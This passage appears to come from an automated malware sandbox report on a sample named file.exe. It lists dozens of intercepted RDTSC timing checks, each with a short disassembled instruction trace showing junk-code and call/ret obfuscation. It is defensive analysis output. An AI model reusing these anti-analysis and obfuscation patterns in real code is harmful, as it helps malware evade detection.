                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247B7F second address: 247B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A68 second address: 1F2A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D65601h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247B96 second address: 247BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A7E second address: 1F2A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A84 second address: 1F2AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0B050E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F84B0B050D6h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AA7 second address: 1F2AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AAF second address: 1F2AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AB5 second address: 1F2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AF36 second address: 24AF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AF3A second address: 24AF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BE58 second address: 24BE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B138 second address: 24B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BE66 second address: 24BEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84B0B050D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f and bx, B93Ch 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F84B0B050D8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122DB75Fh], edx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F84B0B050DFh 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B13C second address: 24B140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BEB4 second address: 24BEBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B140 second address: 24B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B146 second address: 24B16E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B24A second address: 24B254 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24C054 second address: 24C05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24C05B second address: 24C0F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F84B0D655F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38A5h] 0x00000015 mov bx, si 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F84B0D655F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 cld 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 movzx ebx, di 0x00000044 mov eax, dword ptr [ebp+122D0DA1h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F84B0D655F8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2A3Eh] 0x0000006a push FFFFFFFFh 0x0000006c clc 0x0000006d nop 0x0000006e jne 00007F84B0D655FAh 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F84B0D655FFh 0x0000007d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC53 second address: 24DC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC57 second address: 24DC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0D65602h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC77 second address: 24DC81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC81 second address: 24DCE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, 0CDFFFF4h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F84B0D655F8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D23EAh], edx 0x00000031 push 00000000h 0x00000033 jmp 00007F84B0D655FAh 0x00000038 xor edi, dword ptr [ebp+122D33ABh] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 pop edi 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F84B0D655F6h 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 251ADD second address: 251AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F84B0B050F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050DFh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 251AFC second address: 251B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B80 second address: 252B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F84B0B050D6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B90 second address: 252BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov edi, 5D9211F7h 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D23A3h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F84B0D655F8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 and bl, FFFFFFCDh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252BDE second address: 252BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252BFC second address: 252C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253B33 second address: 253BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F84B0B050D8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 and di, F47Bh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F84B0B050D8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1246280Eh], edi 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D1C8Ah] 0x00000052 jmp 00007F84B0B050E8h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jmp 00007F84B0B050E7h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BC8 second address: 253BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65603h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BE4 second address: 253BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BEA second address: 253BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250C8A second address: 250C9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250C9C second address: 250CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250CA1 second address: 250D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F84B0B050E9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 or ebx, 3BA8A5A0h 0x0000001c or dword ptr [ebp+1246A2CCh], eax 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push ebx 0x0000002a jnc 00007F84B0B050DCh 0x00000030 pop ebx 0x00000031 mov di, 1649h 0x00000035 mov eax, dword ptr [ebp+122D0269h] 0x0000003b mov edi, dword ptr [ebp+122D229Ah] 0x00000041 push FFFFFFFFh 0x00000043 mov di, ax 0x00000046 push edx 0x00000047 pop edi 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F84B0B050E4h 0x00000051 jmp 00007F84B0B050DEh 0x00000056 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250D28 second address: 250D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D53 second address: 252D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250D41 second address: 250D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D57 second address: 252D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D64 second address: 252E08 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D33A1h], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D23F8h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F84B0D655F8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 movsx edi, bx 0x00000043 mov edi, dword ptr [ebp+12462BFCh] 0x00000049 mov eax, dword ptr [ebp+122D0275h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F84B0D655F8h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 call 00007F84B0D65603h 0x0000006e xor dword ptr [ebp+12483D9Dh], edi 0x00000074 pop edi 0x00000075 push FFFFFFFFh 0x00000077 jns 00007F84B0D655FCh 0x0000007d add ebx, 4E59522Bh 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 push ecx 0x00000087 push ecx 0x00000088 pop ecx 0x00000089 pop ecx 0x0000008a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253CFF second address: 253D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F84B0B050D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253D0A second address: 253D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D280Ch] 0x00000010 add dword ptr [ebp+12462B5Fh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007F84B0D65605h 0x00000022 mov ebx, edx 0x00000024 pop ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c cmc 0x0000002d mov eax, dword ptr [ebp+122D027Dh] 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F84B0D655F8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d add edi, dword ptr [ebp+122D2C8Ah] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F84B0D655F8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f adc bx, 3CB7h 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253D9C second address: 253DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E5h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DB6 second address: 253DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DBC second address: 253DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DC0 second address: 253DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A8B second address: 255A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A8F second address: 255A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A93 second address: 255A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255C7B second address: 255C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A9FA second address: 28AA0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AA0E second address: 28AA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AA18 second address: 28AA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE5F second address: 28AE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65608h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE7B second address: 28AE97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE97 second address: 28AEA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AEA7 second address: 28AEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F432 second address: 28F43C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F43C second address: 28F453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E0h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F453 second address: 28F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F84B0D65603h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F72C second address: 28F73B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0B050D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F73B second address: 28F743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28FA01 second address: 28FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F84B0B050DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28FA10 second address: 28FA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293C65 second address: 293C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29360F second address: 293636 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F84B0D65604h 0x00000017 pop edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293636 second address: 29363E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29393F second address: 293945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293945 second address: 29394A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29394A second address: 29395B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29395B second address: 293961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B212 second address: 29B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65606h 0x00000009 jmp 00007F84B0D65602h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F84B0D65601h 0x00000015 jmp 00007F84B0D65607h 0x0000001a jmp 00007F84B0D65600h 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B279 second address: 29B299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050DBh 0x00000008 jmp 00007F84B0B050DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299477 second address: 29947B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2998B5 second address: 2998BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F84B0B050D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2998BF second address: 2998E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84B0D65604h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FAh 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299B60 second address: 299B85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jne 00007F84B0B050D6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 jmp 00007F84B0B050DDh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
